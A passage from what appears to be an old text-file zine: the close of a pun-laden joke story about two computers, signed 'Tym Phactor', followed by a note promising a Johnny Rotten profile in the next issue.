        backup, and with a massive power surge, he erupted with a head 
        crash, then rolled over and went to sleep, leaving Mini to use 
        self inductance to complete her routine.
             "Computers," she processed as she recompiled herself,
             "All they ever think about is HEX !"
        
                                   Tym Phactor


----------------------------------------------------------------------------

The profile of Johnny Rotten will be included in the next issue.

----------------------------------------------------------------------------

